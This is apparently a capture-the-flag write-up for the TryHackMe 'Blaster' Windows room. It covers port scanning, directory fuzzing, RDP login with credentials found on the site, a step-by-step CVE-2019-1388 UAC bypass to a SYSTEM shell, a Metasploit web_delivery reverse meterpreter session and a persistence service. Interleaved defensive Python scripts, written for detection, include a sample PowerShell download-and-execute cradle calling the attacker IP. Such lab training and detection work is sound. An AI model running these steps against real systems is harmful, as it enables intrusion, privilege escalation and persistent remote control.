Blaster


Pasted image 20240920114036.png|400
This room is a remix of my previous room Retro with some complications I added to that room having been removed. For increased difficulty and an exercise in patience, check that room out after this. In addition, this room is the sequel to Ice. - DarkStar7471

Active reconnaissance

Enumerate ports and services

General Scan Notes/Nmap

sudo nmap 10.10.73.175 -p- -sS -n --open --min-rate 5000 -vvv -Pn
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack ttl 125
3389/tcp open  ms-wbt-server syn-ack ttl 125

OS

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Vuln analysis

Focused scan

sudo nmap 10.10.73.175 -p 80,3389 -sCV -Pn

Port 80

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server

Pasted image 20240919190344.png|400

Port 3389

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-19T21:55:26+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2024-09-19T21:55:22+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2024-09-18T21:33:25
|_Not valid after:  2025-03-20T21:33:25
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
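As an added example that is not part of the original writeup, the following Python parses the focused-scan output above into a structure and then applies the hardening checks a defender would raise from the same data: the TRACE method enabled on IIS, RDP reachable from the network, and the OS build disclosed through rdp-ntlm-info. The scan text is embedded as a constructed sample so the script runs offline; the only layout assumption is nmap's normal (non-XML) text format.

```python
import re

# Constructed sample: the focused-scan output from this writeup, embedded so the
# example runs offline. Assumes nmap's normal (non-XML) output layout.
NMAP_OUTPUT = """\
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-19T21:55:26+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   Product_Version: 10.0.14393
|_  System_Time: 2024-09-19T21:55:22+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# "80/tcp   open  http   Microsoft IIS httpd 10.0" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Map port number -> {proto, state, service, version, scripts[]}."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = ports[int(m.group(1))] = {
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": [],
            }
        elif line.startswith("|") and current is not None:
            # NSE script lines ("| ...", "|_ ...") belong to the preceding port
            current["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def review_findings(ports):
    """Hardening findings a defender would raise from the same scan data."""
    findings = []
    for port, info in sorted(ports.items()):
        script_text = " ".join(info["scripts"])
        if "risky methods" in script_text and "TRACE" in script_text:
            findings.append((port, "HTTP TRACE method enabled; disable it in IIS request filtering"))
        if info["service"] == "ms-wbt-server":
            findings.append((port, "RDP reachable from the scanner; restrict to VPN/jump host and require NLA"))
        for entry in info["scripts"]:
            if entry.startswith("Product_Version:"):
                build = entry.split(":", 1)[1].strip()
                findings.append((port, f"OS build {build} disclosed via rdp-ntlm-info"))
    return findings


if __name__ == "__main__":
    for port, msg in review_findings(parse_nmap(NMAP_OUTPUT)):
        print(f"{port}/tcp: {msg}")
```

The parser only keys on the port line and the `|` script continuation lines, so it works on any host's normal-format scan, and the checks are where you would add the rest of a baseline (expected ports per host role, allowed service versions).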

Exploitation

Fuzzing

wfuzz -c -t 100 --hc=404,403 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 10.10.73.175/FUZZ

Pasted image 20240919191351.png|500

Retro

Checking the Retro page.
Pasted image 20240919191729.png|500

Check the "Ready Player One" post.
Pasted image 20240919192240.png|500

RDP login

To log in, execute:

xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.73.175 /u:Wade /p:'parzival'

Get the flag
Pasted image 20240919192649.png|200


Privilege Escalation

We find an unusual file.
Pasted image 20240919194547.png|100
Searching for information about the CVE, using the room's hint:
Pasted image 20240919193857.png

The executable on the desktop above gives the next answer.

Exploit CVE-2019-1388

Follow the steps from the repository below, as shown in the screenshots that follow.
https://github.com/nobodyatall648/CVE-2019-1388

  1. Find a program that can trigger the UAC prompt screen:
    hhupd
    and run it as Administrator.
  2. Select "Show more details".
    Pasted image 20240919212955.png|300
  3. Select "Show information about the publisher's certificate".
    Pasted image 20240919213028.png|300
  4. Click on the "Issued by" URL link; it opens a browser window.
    Pasted image 20240919213103.png|300
    Then close the two windows.
  5. Wait for the site to load fully and select "Save as" to open an Explorer "Save as" window.
    Pasted image 20240919213232.png|300
  6. In the address bar of the Explorer window, enter the full path of cmd.exe:
    C:\WINDOWS\system32\cmd.exe
    Pasted image 20240919213413.png|400
  7. You now have an elevated command prompt.
    Pasted image 20240919213447.png|400

Get the flag.
Pasted image 20240919213805.png
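Added example, written for this page and not taken from the writeup or the linked repository: a small detection over constructed Sysmon-style process-creation events (Event ID 1 fields ParentImage, Image, User) that flags the process chain the steps above produce. The public description of CVE-2019-1388 is that the certificate dialog is shown by consent.exe running as SYSTEM, that the "Issued by" link opens the default browser under that SYSTEM token, and that the browser's file dialog is then used to launch cmd.exe; the fix shipped in the November 2019 Windows updates, so on a patched host the chain should never appear. The event records, timestamps and paths are constructed; only the hostname and user name mirror the writeup.

```python
# Constructed Sysmon-style process-creation events. Not real telemetry from the
# room; the RETROWEB/Wade names mirror the writeup, everything else is invented.
EVENTS = [
    {"UtcTime": "2024-09-19 21:29:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\Wade\Desktop\hhupd.exe", "User": r"RETROWEB\Wade"},
    {"UtcTime": "2024-09-19 21:29:40", "ParentImage": r"C:\Windows\System32\consent.exe",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2024-09-19 21:30:05", "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Program Files (x86)\Internet Explorer\iexplore.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2024-09-19 21:34:10", "ParentImage": r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2024-09-19 21:40:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"RETROWEB\Wade"},
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM = r"NT AUTHORITY\SYSTEM"


def basename(path):
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a verdict string for a suspicious event, or None for a benign one."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    user = event["User"]
    # The UAC consent dialog (running as SYSTEM) should never start a browser.
    if parent == "consent.exe" and image in BROWSERS:
        return "browser launched from the UAC consent dialog (CVE-2019-1388 pattern)"
    # A browser normally runs in the interactive user's context, not as SYSTEM.
    if image in BROWSERS and user == SYSTEM:
        return "browser running as SYSTEM"
    # A command shell whose parent is a browser, and which holds SYSTEM, is the payoff step.
    if image in SHELLS and parent in BROWSERS and user == SYSTEM:
        return "SYSTEM shell spawned from a browser"
    return None


def hunt(events):
    """(time, image, verdict) for every event that matches a rule, in log order."""
    return [(e["UtcTime"], basename(e["Image"]), v) for e in events if (v := classify(e))]


def bypass_chain_observed(events):
    """True when the full chain appears in order: consent.exe -> browser, then browser -> SYSTEM shell."""
    browser_from_consent = False
    for e in events:
        v = classify(e)
        if v and v.startswith("browser launched"):
            browser_from_consent = True
        elif v and v.startswith("SYSTEM shell") and browser_from_consent:
            return True
    return False


if __name__ == "__main__":
    for when, image, verdict in hunt(EVENTS):
        print(f"{when}  {image:<14} {verdict}")
    print("full bypass chain observed:", bypass_chain_observed(EVENTS))
```

Each rule on its own is worth an alert; `bypass_chain_observed` correlates them in order so a single log review can distinguish a complete privilege escalation from a lone oddity. Besides detection, the mitigation is simply the 2019 patch.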

Gain remote shell

Select the exploit module:

use exploit/multi/script/web_delivery

Show the module info:

info

Pasted image 20240920083419.png|300

Select the PSH target, by name or by the number shown in the info output:

set target PSH

Set the payload:

set payload windows/meterpreter/reverse_http

Set the lport and lhost, e.g.:

setg lhost 10.6.2.59
setg lport 4747

All ready
Pasted image 20240920084139.png|400
Finally, start it as a background job with run -j.
The module prints a command to run on the target:
Pasted image 20240920092816.png|300
Copy, paste and run it on the Windows machine.
After running it, return to Metasploit, where a session is now open:
Pasted image 20240920094759.png|600
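Added example (mine, not the writeup's): the PSH target of web_delivery hands you a PowerShell one-liner that fetches and executes a stage, typically combining -nop, -w hidden and an IEX download cradle, or a base64 -EncodedCommand form of the same. The Python below scores PowerShell command lines for those indicators, decoding -EncodedCommand so the cradle hidden inside it is inspected too, which is the shape of the rule a defender would run over process-creation command lines after seeing this section. The command lines are constructed stand-ins rather than captures from the room (the 10.6.2.59 address is the lhost used above), and the weights and threshold are my assumptions.

```python
import base64
import re

# Weighted indicators of a PowerShell download-and-execute cradle (weights are assumptions)
INDICATORS = [
    (r"(?i)(?:^|\s)-nop\b|-noprofile\b", 1, "no profile"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)\biex\b|invoke-expression", 2, "IEX"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b", 2, "download cradle"),
    (r"(?i)new-object\s+(?:system\.)?net\.webclient", 1, "WebClient"),
    (r"https?://\d{1,3}(?:\.\d{1,3}){3}", 1, "raw-IP URL"),
]
# -e / -ec / -enc / -encodedcommand followed by a base64 blob
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded(cmdline):
    """If the command line uses -EncodedCommand, return the decoded UTF-16LE script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmdline):
    """Return (total_weight, [indicator names]) for a command line, decoded script included."""
    decoded = decode_encoded(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for pat, _, name in INDICATORS if re.search(pat, text)]
    total = sum(w for _, w, name in INDICATORS if name in hits)
    if decoded is not None:
        # Encoding on its own is a weak signal; it mostly matters for what it hides.
        hits.append("encoded command")
        total += 2
    return total, hits


def is_cradle(cmdline, threshold=5):
    """Alert when enough weighted indicators stack up (threshold is an assumption)."""
    return score(cmdline)[0] >= threshold


# Constructed samples standing in for what web_delivery prints; not captured from the room.
STAGE = "IEX ((new-object net.webclient).downloadstring('http://10.6.2.59:8080/stage'))"
SAMPLE_PLAIN = 'powershell.exe -nop -w hidden -c "' + STAGE + '"'
SAMPLE_ENCODED = "powershell.exe -nop -w hidden -e " + base64.b64encode(STAGE.encode("utf-16-le")).decode("ascii")
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        total, hits = score(sample)
        print(f"{total:>2} {'ALERT' if is_cradle(sample) else 'ok   '} {hits}")
```

The benign sample shows why a single indicator (here -ExecutionPolicy Bypass, which is common in legitimate scheduled scripts) is not scored on its own: the rule fires on the combination of a hidden window, an in-memory execute and a network fetch, which is what the stager needs and routine administration rarely does.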

Persistence

Use the session number obtained in the last step.
Load the module and set its options:

use exploit/windows/local/persistence_service

Pasted image 20240920103609.png|700
Run exploit.
Pasted image 20240920103644.png|700
Alternatively, use the module:

use exploit/windows/local/persistence_service

Pasted image 20240920104008.png|700
Then run exploit.
Pasted image 20240920104042.png|700
The next time the system reboots, start a listener with the handler and the reverse shell will connect back to us automatically.
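Added example for the persistence step, not from the writeup: persistence_service installs a new Windows service that starts the payload at boot. As I understand the module, its defaults are a random service name and a payload executable dropped under a temp directory, running as LocalSystem with automatic start; treat those defaults as assumptions. Service installation is recorded as Event ID 7045 in the System log (and 4697 in the Security log when service-install auditing is enabled), and that event carries the service name, file name, start type and account. The Python below parses constructed 7045-style lines and flags services whose binary lives in a user-writable location; the flattened line format, the directory list and the sample services are all constructed for this example.

```python
import re

# Constructed sample lines in a flattened "Event ID 7045" layout (assumption:
# one event per line; real events carry these fields in the message body).
SERVICE_EVENTS = [
    "7045 Service Name: Sysmon64 Service File Name: C:\\Windows\\Sysmon64.exe "
    "Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem",
    "7045 Service Name: kjHGfdsaQw Service File Name: C:\\Users\\Wade\\AppData\\Local\\Temp\\rad8F3A1.exe "
    "Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem",
    "7045 Service Name: gupdate Service File Name: \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc "
    "Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem",
    "7045 Service Name: WinDefenderUpd Service File Name: C:\\ProgramData\\update.exe "
    "Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem",
]

EVENT_RE = re.compile(
    r"^7045 Service Name: (?P<name>.+?) Service File Name: (?P<path>.+?) "
    r"Service Type: (?P<type>.+?) Service Start Type: (?P<start>.+?) Service Account: (?P<account>.+)$"
)

# Directory fragments an unprivileged user can normally write to (assumption-based list)
WRITABLE_HINTS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def parse_service_event(line):
    """Return the 7045 fields as a dict, or None if the line is not a service install."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def binary_path(file_name):
    """Strip quotes and trailing arguments from 'Service File Name' to get the executable path."""
    file_name = file_name.strip()
    if file_name.startswith('"'):
        return file_name[1:file_name.find('"', 1)]
    return file_name.split(" ")[0]


def assess(event):
    """List the reasons a service install looks like persistence (empty list = nothing to say)."""
    reasons = []
    path = binary_path(event["path"]).lower()
    if any(hint in path for hint in WRITABLE_HINTS):
        reasons.append("binary in user-writable location")
    # Account and start type only matter once the binary location is already suspicious.
    if reasons and event["account"].lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    if reasons and event["start"].lower() == "auto start":
        reasons.append("auto start (survives reboot)")
    return reasons


def suspicious_services(lines):
    """(service name, binary path, reasons) for every flagged install, in log order."""
    out = []
    for line in lines:
        event = parse_service_event(line)
        if event and (reasons := assess(event)):
            out.append((event["name"], binary_path(event["path"]), reasons))
    return out


if __name__ == "__main__":
    for name, path, reasons in suspicious_services(SERVICE_EVENTS):
        print(f"{name:<16} {path}\n    " + "; ".join(reasons))
```

The quoted GoogleUpdate entry is there to show the path handling: a legitimate auto-start LocalSystem service under Program Files passes, while the same start type and account combined with a binary in a temp directory is the pattern that should page someone, whatever the service is called. Removing the persistence means stopping and deleting the service and the dropped executable, then reviewing what else ran under that session.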

To answer the question we have to search the internet, because the Meterpreter scripts are deprecated and the tool itself gives no information that leads to the answer.